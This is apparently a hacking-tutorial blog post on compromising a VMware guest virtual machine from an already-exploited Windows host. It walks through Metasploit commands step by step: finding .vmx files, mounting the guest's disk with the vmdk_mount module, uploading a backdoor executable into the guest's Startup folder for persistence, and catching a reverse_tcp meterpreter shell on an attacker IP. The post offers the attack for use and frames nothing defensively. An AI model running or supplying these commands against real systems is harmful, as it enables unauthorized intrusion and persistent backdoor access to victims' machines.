Hello friends!! Today you
will how to exploit any operation system running inside the virtual machine.
Requrement
Attacker: kali linux
Target: VM image windows
server 2012
First attacker needs to exploit actual operating system
of victim PC and attain the meterpreter session with admin privileges.
From given image you can perceive I have seize windows 10
meterpreter session and also gained admin privileges.
Meterpreter > sysinfo
When you install any operating system in your vmware
workstation then all its hardware and network setting get store as .vmx file in
actual operating system in order to create new virtual image.
Type following for making search of .vmx file stored in it
Meterpreter > search –f *.vmx –r
From given image you can perceive
that it has dump the all location where .vmx files are stored.
Using cat command you can read the content of
file as these file simple text document which contain vm setting information.
We had opened windows server 2012 vm image
through cat command.
Meterpreter > cat “d:/VM/windows-server-2012/windows Server
2012/windows Server 2012.vmx”
Here from given below image you can read the details of
this file which is describing network and hardware setting.
This module mounts a vmdk file (Virtual Machine Disk) on
a drive provided by the user by taking advantage of the vstor2 device driver
(VMware). First, it executes the binary vixDiskMountServer.exe to access the
device and then it sends certain control code via DeviceIoControl to mount it.
Use the write mode with extreme care. You should only open a disk file in
writable mode if you know for sure that no snapshots or clones are linked from
the file.
use
post/windows/manage/vmdk_mount
msf post(vmdk_mount) > set DEL_LCK true
msf post(vmdk_mount) > set READ_MODE false
msf post(vmdk_mount) > set session 2
msf post(vmdk_mount) > set VDK_PATH “d:/VM/windows-server-2012/windows Server 2012/windows
Server 2012.vmx”
msf post(vmdk_mount) > run
Great!! We
have successfully mount vmdk file of windows server2012.
meterpreter > show_mount
Now from given below image you can read the information of
each drives.
Now using given below command I will upload an exe backdoor
in L: drive which will give us reverse connection of windows server 2012
when it will be running inside vm workstation.
Meterpreter > upload /root/Desktop/abc.exe
“L:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup”
use
exploit/multi/handler
msf exploit(handler) >set payload
windows/meterpreter/reverse_tcp
msf exploit(handler) >set lhost 192.168.1.113
msf exploit(handler) >set lport 445
msf exploit(handler) >run
Awesome!! We
have successfully exploited windows server2012 virtual machine and gained its
meterpreter session.
Meterpreter >sysinfo
0 comments:
Post a Comment